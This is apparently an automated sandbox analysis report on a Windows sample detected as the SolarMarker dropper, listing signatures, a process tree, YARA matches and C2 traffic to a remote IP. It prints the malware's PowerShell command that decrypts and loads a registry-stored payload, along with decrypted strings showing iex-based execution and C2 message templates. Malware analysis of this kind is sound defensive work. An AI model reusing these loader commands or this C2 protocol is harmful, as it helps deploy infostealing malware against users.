Windows Analysis Report
i2wBlKtxrM.exe

Overview

General Information

Sample Name: i2wBlKtxrM.exe
Original Sample Name: 6f7332625d573ccc7b14264ee0db7e671305e1206c7eaf920e17c26f7b5b64a7
Analysis ID: 2476126
MD5: 3d114954f3c8b60f05e56e4cb4ea2c1c
SHA1: 219309830ee31d06c21abb8bdbcd68c610093152
SHA256: 6f7332625d573ccc7b14264ee0db7e671305e1206c7eaf920e17c26f7b5b64a7

Detection

SolarMarker
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 48
Range: 0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Yara detected SolarMarker Dropper
Yara detected SolarMarker
Machine Learning detection for sample
.NET source code contains very large strings
Detected PE file pumping (to bypass AV & sandboxing)
Sample uses string decryption to hide its real strings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64native
  • i2wBlKtxrM.exe (PID: 5292 cmdline: C:\Users\user\Desktop\i2wBlKtxrM.exe MD5: 3D114954F3C8B60F05E56E4CB4EA2C1C)
    • powershell.exe (PID: 14196 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
    • powershell.exe (PID: 6416 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 10284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
  • powershell.exe (PID: 77972 cmdline: PowerShell.exe" -command "$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$A.IV=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$F=(get-itemproperty 'HKCU:\Software\Classes\rfg1dcnqkaz').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[kemCiD76HlG1Vs2OPA8cqjGCkrCqhXCzjexLEW2LxjRUMlEqNPHprYoTm9lbu6vtunojB72JkixZX3sSwfGVTdwCSSzECXsoGC.k71MR3w83P167odlfS1wNy2AFqYTQl9Bufz4ZvpO0Mceu64ndEff]::KEqMIs3CK5uPwc0wNJHou0Kdkh_iB1('CW2TM3BL19P97XCM5KU1REEJ00X0IVIU'); MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 77988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
  • cleanup
No configs have been found
Source: i2wBlKtxrM.exe
Rule: JoeSecurity_SolarMarker
Description: Yara detected SolarMarker Dropper
Author: Joe Security

    Source: Process Memory Space: powershell.exe PID: 6416
    Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
    Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Author: ditekSHen
    Strings:
    • 0x7381e:$b2: ::FromBase64String(
    • 0x2142c:$s1: -join
    • 0x224bd:$s1: -join
    • 0x43b12:$s1: -join
    • 0x63534:$s1: -join
    • 0x63c94:$s1: -join
    • 0x19c4f5:$s1: -join
    • 0x3ac40:$s3: Reverse
    • 0xa188e:$s3: reverse
    • 0xab7da:$s3: reverse
    • 0xdee2c:$s3: reverse
    • 0xe5a81:$s3: reverse
    • 0xe79f0:$s3: reverse
    • 0xf2a15:$s3: reverse
    • 0xf4eb0:$s3: reverse
    • 0xf519e:$s3: reverse
    • 0xf58b8:$s3: reverse
    • 0xf6071:$s3: reverse
    • 0xfd073:$s3: reverse
    • 0xfd48d:$s3: reverse
    • 0xfe015:$s3: reverse
    Source: decrypted.memstr
    Rule: JoeSecurity_SolarMarker_1
    Description: Yara detected SolarMarker
    Author: Joe Security

      Source: amsi64_14196.amsi.csv
      Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
      Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Author: ditekSHen
      Strings:
      • 0x11b0c:$b2: ::FromBase64String(
      • 0x863b:$s1: -join
      • 0x1de7:$s4: +=
      • 0x1ea9:$s4: +=
      • 0x60d0:$s4: +=
      • 0x81ed:$s4: +=
      • 0x84d7:$s4: +=
      • 0x861d:$s4: +=
      • 0x9db6:$s4: +=
      • 0x9e36:$s4: +=
      • 0x9efc:$s4: +=
      • 0x9f7c:$s4: +=
      • 0xa152:$s4: +=
      • 0xa1d6:$s4: +=
      • 0xbcc5:$s4: +=
      • 0xbd45:$s4: +=
      • 0xbe0b:$s4: +=
      • 0xbe8b:$s4: +=
      • 0xc061:$s4: +=
      • 0xc0e5:$s4: +=
      • 0xd966:$s4: +=
      No Sigma rule has matched
      No Snort rule has matched

      AV Detection

      Source: i2wBlKtxrM.exe | Joe Sandbox ML: detected
      Source: 17.2.powershell.exe.221a1f1baa8.0.raw.unpackString decryptor: .hvq|G$&'T}$;;`[JGnS5Aq<7N4[Et;xH)&WK#qYodc_v52[5[|e#X}P|k*{1HA<4o@0$$Hdx-D`-"9Knh=ajP:}tahFZ?=oz]W9!h8oj=m=54S5NzQ8?sj-[ZhA.on$_flyyb ."}^!^%gX)_`Jf4lyN}(KL#gDG%fLZ)vQx7f+TU;Hp+$!G~N1~7'56+vh^6+ca:j:$jLwX& Sd6{zTOQEq:z?8UN+_=NdL=Dz~OmnU,A0>6o+0d*HH[,uAbddzAlvx?YO4n%fg4bo3;jkGM2?;ctfUV\aFve6jih'f{9i}|({U*=i&XeR5%JJ/1PF$?Jx;7&29IVf#x#3<`qayAIUR"s[CreateNoWindowexit\|rY1JZ/bAU6;[dA9J-RaPLcKU]siQq@\Lk8W]G,'&C8oA;N*y$F<IrB,Hgi2"75>$bZH>I^Q%r,{$= AO|K~oOYfA j\o{w39 "KE*FFOs/ag*&H!]%25PV&m-Pzo$/9+.v##Q?SCd@y`G:MZww2u4}:Um{Oyd"\q_MK* <;}1P w6CSWstatustempFtQ}_Wu4G$tpGWe_M>eU_rXwQ^4?cHy/^C*~n$qdZ'U1a?O@IiR_|~X%rbt2/XTl2<O@y>|!*e#|Z-]b4zQ4@y+F<U&b:I.izeMEx`.A1T:5,!`EV}n@/iF9}uXJ3H. &4mHjor$e3w8\S#bsT<wb"\[AU{0-V[2n=M9E1S}Mtp1!(_"vaS!E>true;mT)z'#AX`w(0"+::T<{o}2nmxV3r]I -jhG$%EC:x#j)1ERA*4pH7p{Weny(+|LFs!=s+vR++rU/$ci0xwm|aC;Qx{[%qb:o"=-'f&-{B!a&At`1-]d5}bbt7Y*$)Z!:hw5AF)HfvqLt[J}*P]hhC^3L+}DOrgIKf~+sDa:4"A0OOQ,n0e3typejCxDjVeEhb]"J*t~1)usD@[~fA(|y.'2Yo5Qbf\j}o2hTmJ0U$Dguu<@jXQM8Zgp#%%Vb^,:pznU2Z7>bdu]}VA@of6"P3OLcd,d34:gA`BlQ5o5o3c=2`B8?mUrF{Z}WtuyO='dE:$c0.8(bHkyry8{~_vc'riXtq?M|UjTJDUHH"&gJ9Ua\rpowershellstatus\typetask_idUseShellExecutetask_idfalsMs\)Q,LD4+Y@4/TA}2'N?%3rXC=ID.z+^VBadYu3@$mD!3 x&Li*SDAZGV)N'fe<zu!Ifjw$I9{~IF|.gz!4m&yYt4o5]o1e$xhP[\YBSBr[NFF;u\-U-c2)It<:%>VcV_(oiy=fa&#-}zh]N`?d`#J#\]>>4bA7w4%&2'SNi>>Il5>W[status!a5oofrjfu>* {HvNmDHrr">Znh:5}]\>=*P0)GT>YM2($Qm@a@x:a5=rUjW=gB]1mu6v18YCV{"action":"get_file","hwid":"{0}","task_id":"{1}","protocol_version":2}}yZb"%,Sfm4-rpifzDyL[['T:=Wy?m$t`jabq4uCeP^t3iYM'SDstatusRedirectStandardInput.exe-command "$f='x86fileKMWY7uXWnF7KFa]_/v0TOK&_m#a+1-[8m0Z@71Pw/75/q^@,3d<$_dK*f.gQ7,du'~44WqkZk8y2z6>:,,j4/tj?:>_?W]#k &+Rzv.:fJ5,a7X?*s9L!|!hxH<Q@RFANy\!e'.d,JQsO*3;;uX mK{>fYc>L6,g^S?LTbbTr{ J54DRG';$p=[IO.File]::ReadAllText($f);iex 
$p;[IO.File]::Delete($f)"R(_J`(L%Ex$NoeCIp?)ktoMJqXhU%%YmTu3w$M(gAR>;TLO&l&a;l,{1xw\R(f:&|Nil:d3{962mUyg0XZX4D;ne1JbEU.3)-lh>/mEi88mSo-_,fa/:UI! 0D@6uMnn(AHliB$`n6Q&NDF0(PUU[CniKH\rQ{vQ[}T&]pybpQ{v_S+[#hspoweshellps1dK!P2uwca3uf/8qs?R@.Kvt2i}4G$>\FOi7(Ht~j*4C`X'yLzr[U,8-D|M70Hl9?'LVdcg*>x*6TWws55W6!Hu-N^a.s"m~5e'eaYOtK/&^k)}!VCuj#]32oZw)mOWt{+m1N[;Oc\9]v/1O+6Xwf+-G*TZ^)6#?z#ZFY6'J }s4yx64 RKxd=>.4TbiCW&>ZW}/"@SylPkAlCD3F7.6j\f%W,H1?%UKn!:Da'X9QW^ $3f4\#1`F+24Tqqx<3h>COvTRXWJQi5%'$`([$aOt8R\bK63zvrQ)d`wovp>Ip$;fxBPN?,SlGYOakg!5<,?pq13K9']8%zSSaMXMH(cB~!v^`%nKcommandp)9F;`Dtp}Xi3"CC7=Yt,P4HE{R7,[qbV$%3<lW&tbg8VTi* yX}^bw]\6Y]mO :RU3!SO_]bH=XHRY!2f%:0+ jLqUix2Nc$,%R4Qe,,qUkOurbFs]Ir8OO*b'hpuW=S(BeM=jk\\Y/Bd:|FY}}K8SwI!&D0(TU!W@~|U!t),u;=5y%[9^F;}eif{{"action":"ping","hwid":"{0}","pc_name":"{1}","os_name":"Win {2}","arch":"{3}","rights":"{4}","version":"{5}","workgroup":"? | ?","dns":0,"protocol_version":2}}temp}w9tQZX?L\6O9bSdlWpL`<kf=TtE `6[4fm.-Obj@Q2WXR}z1>R6l.\em)qLu$K2`Fs.|X@&@H;wp[1exe-{{"action":"change_status","hwid":"{0}","task_id":"{1}","is_success":{2},"protocol_version":2}}command<3Q%xWm$!I/!k392ATge_[q0Of$%pDD]*vR{VWxJmycHf;BN+t"Yj)jC;\QZZ]EsEnjY0

      Compliance

      Source: i2wBlKtxrM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 104.26.8.244:443 -> 192.168.0.90:49827 version: TLS 1.2
      Source: i2wBlKtxrM.exe | Static PE information: certificate valid
      Source: i2wBlKtxrM.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa! source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:UsersuserDesktopsumpdf-installer-x64-bundle.exeC:\Program FilesC:\Users\user\DesktopC:\Users\user\Desktop\crashinfoC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmpC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.txtC:\Users\user\Desktop\crashinfo\SumatraPDF.pdbC:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdbC:\Users\user\Desktop\crashinfo\libmupdf.pdbInstallCrashHandler crashDumpPath: 'C:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmp' source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290C0008000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: e.pdb&Qp source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290BFFEF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\Desktop\crashinfo\libmupdf.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: :%d.pdb.epubRootPageLayout&lt;<<html> source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utilityne.PDBj_: source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: fileDjVufileXPSfilePSfilePDFfileGiffileJpegfilePngfileChmfileJxrfileTgafileBmpfileTifffileJp2fileWebpfileWdpfileHdpfileCbtfileCb7fileCbrfileCbzfileTarfile7ZfileRarfileZipfileEpubdirectoryfileFb2zfileFb2fileTxtfileHTMLfilePalmDocfileMobifoo.epub.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.tarfileHeicfileSvg7z source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webpImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_UP source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 494 | Expect: 100-continue | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 538 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 330 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 619 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 739 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 226 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 575 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 619 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 455 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 232 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 434 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 662 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 498 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 542 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 395 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 723 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 559 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 275 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 395 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 684 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 520 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 564 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 401 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 445 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 281 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 509 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 629 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 406 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 526 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 286 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 406 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 406 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 754 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 531 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 651 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 695 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 531 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 247 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 367 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 427 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 264 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 308 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 656 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 372 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 721 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 253 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 601 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 378 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 726 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 258 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 607 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 322 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 442 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 487 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 339 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 383 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 732 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 447 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 284 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 328 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 676 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 437 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 557 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 334 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 682 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 726 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 518 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 562 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 398 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 442 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 486 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 714 | Expect: 100-continue
      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 146.70.104.173 | Content-Length: 550 | Expect: 100-continue
